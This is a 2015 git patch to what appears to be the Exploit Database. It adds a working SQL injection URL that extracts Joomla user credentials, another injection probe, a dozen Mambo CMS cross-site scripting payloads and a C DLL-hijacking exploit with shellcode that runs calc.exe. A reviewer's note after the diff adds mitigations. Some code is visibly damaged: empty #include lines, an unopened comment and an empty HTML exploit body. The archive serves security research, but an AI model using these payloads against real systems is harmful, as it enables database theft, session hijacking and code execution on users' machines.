From 4b322b34f06ea66dd776dd586ab8f6c3c96d85ea Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 26 Jan 2015 08:36:28 +0000
Subject: [PATCH] Update: 2015-01-26 5 new exploits
---
 files.csv | 5 ++++
 platforms/php/webapps/35882.txt | 7 +++++
 platforms/php/webapps/35883.txt | 7 +++++
 platforms/php/webapps/35884.txt | 31 +++++++++++++++++++++
 platforms/windows/remote/35880.html | 19 +++++++++++++
 platforms/windows/remote/35881.c | 43 +++++++++++++++++++++++++++++
 6 files changed, 112 insertions(+)
 create mode 100755 platforms/php/webapps/35882.txt
 create mode 100755 platforms/php/webapps/35883.txt
 create mode 100755 platforms/php/webapps/35884.txt
 create mode 100755 platforms/windows/remote/35880.html
 create mode 100755 platforms/windows/remote/35881.c
diff --git a/files.csv b/files.csv
index f1a102b36..091dd870b 100755
--- a/files.csv
+++ b/files.csv
@@ -32322,3 +32322,8 @@ id,file,description,date,author,platform,type,port
 35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 'pageTitle' Parameter Cross Site Scripting Vulnerability",2011-06-22,"High-Tech Bridge SA",php,webapps,0
 35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0
 35877,platforms/php/webapps/35877.txt,"Sitemagic CMS 'SMTpl' Parameter Directory Traversal Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0
+35880,platforms/windows/remote/35880.html,"LEADTOOLS Imaging LEADSmtp ActiveX Control 'SaveMessage()' Insecure Method Vulnerability",2011-06-23,"High-Tech Bridge SA",windows,remote,0
+35881,platforms/windows/remote/35881.c,"xAurora 10.00 'RSRC32.DLL' DLL Loading Arbitrary Code Execution Vulnerability",2011-06-24,"Zer0 Thunder",windows,remote,0
+35882,platforms/php/webapps/35882.txt,"Nodesforum '_nodesforum_node' Parameter SQL Injection Vulnerability",2011-06-23,"Andrea Bocchetti",php,webapps,0
+35883,platforms/php/webapps/35883.txt,"Joomla! 'com_morfeoshow' Component 'idm' Parameter SQL Injection Vulnerability",2011-06-27,Th3.xin0x,php,webapps,0
+35884,platforms/php/webapps/35884.txt,"Mambo CMS 4.6.x Multiple Cross Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0
diff --git a/platforms/php/webapps/35882.txt b/platforms/php/webapps/35882.txt
new file mode 100755
index 000000000..964f5d8b3
--- /dev/null
+++ b/platforms/php/webapps/35882.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/48451/info
+
+Nodesforum is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/?_nodesforum_node=u1'
\ No newline at end of file
diff --git a/platforms/php/webapps/35883.txt b/platforms/php/webapps/35883.txt
new file mode 100755
index 000000000..ff73d6f2f
--- /dev/null
+++ b/platforms/php/webapps/35883.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/48452/info
+
+The 'com_morfeoshow' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=1015+and+1=0+union+select+1,2,concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+
\ No newline at end of file
diff --git a/platforms/php/webapps/35884.txt b/platforms/php/webapps/35884.txt
new file mode 100755
index 000000000..edf45ff9c
--- /dev/null
+++ b/platforms/php/webapps/35884.txt
@@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/48455/info
+
+Mambo CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Mambo CMS 4.6.5 is vulnerable; other versions may also be affected;
+
+http://www.example.com/mambo/index.php?option=com_content&task=%22%20style=width:1000px;height:1000px;top:0;left:0;position:absolute%20onmouseover=alert%28/XSS/%29%20&id=3&Itemid=32
+
+http://www.example.com/mambo/administrator/index2.php?option=com_menumanager&task=edit&hidemainmenu=1&menu=Move+your+mouse+here%22%20style=position:absolute;width:1000px;height:1000px;top:0;left:0;%20onmouseover=alert%28/XSS/%29%20
+
+http://www.example.com/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS
+
+http://www.example.com/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20%20%20style=background-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS
+
+http://www.example.com/mambo/administrator/index2.php?limit=10&order%5b%5d=11&boxchecked=0&toggle=on&search=simple_search&task=&limitstart=0&cid%5b%5d=on&zorder=c.ordering+DESC">&filter_authorid=62&hidemainmenu=0&option=com_typedcontent
+
+http://www.example.com/mambo/administrator/index2.php?limit=10&boxchecked=0&toggle=on&search=xss">&task=&limitstart=0&hidemainmenu=0&option=com_comment
+
+http://www.example.com/mambo/administrator/index2.php?option=com_modules&client=%27%22%20onmouseover=alert%28/XSS/%29%20a=%22%27
+
+http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2
+
+http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20style%3d-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss)%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2
+
+http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20%20style=background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2
+
+http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;dis
+
+http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2
\ No newline at end of file
diff --git a/platforms/windows/remote/35880.html b/platforms/windows/remote/35880.html
new file mode 100755
index 000000000..73e268e94
--- /dev/null
+++ b/platforms/windows/remote/35880.html
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/48408/info
+
+LEADTOOLS Imaging LEADSmtp ActiveX control is prone to a vulnerability caused by an insecure method.
+
+Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges.
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/windows/remote/35881.c b/platforms/windows/remote/35881.c
new file mode 100755
index 000000000..38d6c78d7
--- /dev/null
+++ b/platforms/windows/remote/35881.c
@@ -0,0 +1,43 @@
+source: http://www.securityfocus.com/bid/48432/info
+
+xAurora is prone to a vulnerability that lets attackers execute arbitrary code.
+
+An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
+
+*/
+
+#include
+#include
+#include
+
+
+char shellcode[]="\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00" "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56" "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63" "\x2e\x65\x78\x65\x00";
+
+int xAuroraPwnage()
+{
+int *ret;
+ret=(int *)&ret+2;
+(*ret)=(int)shellcode;
+MessageBox(0, "[+] xAurora Pwned By Zer0 Thunder !", "Not so Secured Browser", MB_OK);
+return 0;
+
+}
+BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
+{
+ xAuroraPwnage();
+ return 0;
+}
+
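Review bot: The header comment in 35881.c never names the DLL the application loads or says what the embedded byte string does, so a reader has only the files.csv entry (`RSRC32.DLL`) and the last bytes of `shellcode`, which spell `calc.exe` and presumably launch the calculator — confirm; the comment should state both, e.g. `/* PoC DLL: loaded as RSRC32.DLL from the directory of the opened file; shows a MessageBox, then transfers control to the embedded payload (calc.exe) */`. As rendered here the comment block also has a closing `*/` with no opening `/*` and the three `#include` lines have lost their header names, which looks like an extraction artifact rather than the committed text but is worth checking before the file is indexed. For triage, the indicators are a `RSRC32.DLL` sitting next to documents on a share and a dialog titled `Not so Secured Browser`; the application-side defect is resolving a DLL by bare name through the current directory, which the usual mitigations (SetDllDirectory with an empty string, or the CWDIllegalInDllSearch policy) remove from the search path.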